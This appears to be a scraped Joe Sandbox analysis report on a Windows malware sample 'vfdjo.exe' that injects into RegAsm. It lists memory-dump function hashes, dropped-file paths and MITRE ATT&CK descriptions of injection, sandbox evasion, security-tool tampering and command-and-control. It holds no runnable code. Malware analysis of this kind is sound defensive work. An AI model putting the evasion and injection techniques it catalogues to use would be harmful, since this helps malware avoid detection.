Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa653672e22216ec4a4809262cf38060ee4a5206223d4b396449db18f656b376
Instruction ID: e3e903ace242029d2cb364d81c0f3982bbfbccb8a4ed21b3f2bd133c22b23d13
Opcode Fuzzy Hash: aa653672e22216ec4a4809262cf38060ee4a5206223d4b396449db18f656b376
Instruction Fuzzy Hash: 7EF01430D00319CFCB40DFA9D9446AABBF1EF48310B208529D519A7750D331AA42CF80

Function 06A045D8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c999827ae33c269ff2cb7fed04346087edb2bc5c2f62e111fbbd78a86c098798
Instruction ID: 4cf60de956e4c76e900d1a4488d5370361b51b664650f316dbffb9d591bd2fc5
Opcode Fuzzy Hash: c999827ae33c269ff2cb7fed04346087edb2bc5c2f62e111fbbd78a86c098798
Instruction Fuzzy Hash: C2E068613093502BC745366E2C8006BBFDADFCB220741007FE14CC7782C8181C0547E1

Function 06A05BCA Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fa365c4eb309ce1bfe7e7907d9e29af19e1333d2b2f29ab39f45fa6a37d9b29
Instruction ID: 96d99637887040728719167c8a719a135c5a69d372002a7dd1a13c2da6be2a80
Opcode Fuzzy Hash: 6fa365c4eb309ce1bfe7e7907d9e29af19e1333d2b2f29ab39f45fa6a37d9b29
Instruction Fuzzy Hash: 43E06572A01109ABCB40EBB4DE5199E77A6EF44344711C968A404D7251EA31DA159B80

Function 06A045E8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5380dae5242315e08f9bc33c58ee35a2165c47da20f4b515908b6f9312d54b1
Instruction ID: 9f9f0a8a6b063f4e81dfa94db5b4643b06431a762117749c0ed74280794aece6
Opcode Fuzzy Hash: e5380dae5242315e08f9bc33c58ee35a2165c47da20f4b515908b6f9312d54b1
Instruction Fuzzy Hash: 3DD02E22300220234688318F2C8056FA6CEDFCAAA1B90003EE20DC7380CC26AC0603E8

Function 06A05BD0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e0d08b90e7b292fb09a479638e97135f18d98ec16de0afdd9a956bd760e176
Instruction ID: b4300511bfade053532bcadf6df49994ca46d2463dcac6de09897868b93ab48c
Opcode Fuzzy Hash: 46e0d08b90e7b292fb09a479638e97135f18d98ec16de0afdd9a956bd760e176
Instruction Fuzzy Hash: 69E0DF31A0020DBFCB00EFB5DE4086FBBEAEF81344700C4A8E804DB251EA31EE059B90

Function 06A05D8A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b98f4ab5a772e9381ef3e718d8284312712b01c9c0d08331dd54af757c1167
Instruction ID: 48fc563f813c6af63773fbaf268780f904c6f39d8bb87cd6978b69ed2902ebb0
Opcode Fuzzy Hash: b7b98f4ab5a772e9381ef3e718d8284312712b01c9c0d08331dd54af757c1167
Instruction Fuzzy Hash: 0CE0DF30B06204AFCB41CBB4CBA02AE7BB2AF82244310C1DAE408DB281E6308E168780

Function 06A05D98 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41300219bda84d6eb83f8f9a96fcbae72e4466c21e7aecf2f920cdf003ff60fe
Instruction ID: f4e221c0584ccc34c8ae05dd6dc285e48ec5ee2418cbdd1c8c2cfb99389a9298
Opcode Fuzzy Hash: 41300219bda84d6eb83f8f9a96fcbae72e4466c21e7aecf2f920cdf003ff60fe
Instruction Fuzzy Hash: 82D05E30B01208EB9B40DFB5DA5556EB7EBEB81244B10C1A8E808C7340EA319E029B80

Non-executed Functions

Function 06A00040 Relevance: 1.7, Strings: 1, Instructions: 451COMMON

Download Yara Rule

Strings

\;^q, xrefs: 06A00074

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: \;^q
API String ID: 0-2342212615
Opcode ID: 598020bd0e807bb915039d937ae318be0fb03bc121345f332200b6f4d8a2f24c
Instruction ID: 769138814bd0b0f132d2fca13b6a6f9816f9fed931851745de79276d5fcc8cff
Opcode Fuzzy Hash: 598020bd0e807bb915039d937ae318be0fb03bc121345f332200b6f4d8a2f24c
Instruction Fuzzy Hash: A9222A30D1071ACFEB60EF64C844B99B7B2BF99300F119699D5497B250EB70AAC9CF90

Function 06A07460 Relevance: 1.0, Instructions: 1032COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd8b96801ca87892610dbb28ffbae911d6c985ac10b49b9f70050295e44a51c
Instruction ID: a011f81f759097fc40e10b657957076846746d34edba3bddf26667890200da64
Opcode Fuzzy Hash: 7bd8b96801ca87892610dbb28ffbae911d6c985ac10b49b9f70050295e44a51c
Instruction Fuzzy Hash: 07826E30B002048FEB54EF69D9D4B6EB6E2BF84304F508579D1068B3A6CF75ED4A8B91

Function 01342792 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147738190.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1340000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9356bf10d7747b4e76a1837dc5aafe0d3e26c23cdfbc7634021fed3f865aa4b
Instruction ID: 4a605bc221459625c74a6750af07961f53655d3716276eadc82b1165a6b755af
Opcode Fuzzy Hash: b9356bf10d7747b4e76a1837dc5aafe0d3e26c23cdfbc7634021fed3f865aa4b
Instruction Fuzzy Hash: 4A918F36F0031647EB18896E9D903AFA5E79BC8118F4D8139FA46EFB46ED74F9025381

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report vfdjo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vfdjo.exe.log

C:\Users\user\AppData\Local\Temp\RESD93C.tmp

C:\Users\user\AppData\Local\Temp\lvbdqmie\CSC98E74741E11B4215AF424C82513491D.TMP

C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.0.cs

C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline

C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll

C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.out

Static File Info

General

Windows Analysis Report
vfdjo.exe

Function 010027FC Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 01002808 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 01002578 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Function 01002580 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 010023E0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 01002668 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 010023E8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 01002670 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 010024B8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Function 010024C0 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Function 01002330 Relevance: 1.6, APIs: 1, Instructions: 52
threadCOMMON

Function 01002338 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Function 01342F19 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 456
nativeCOMMON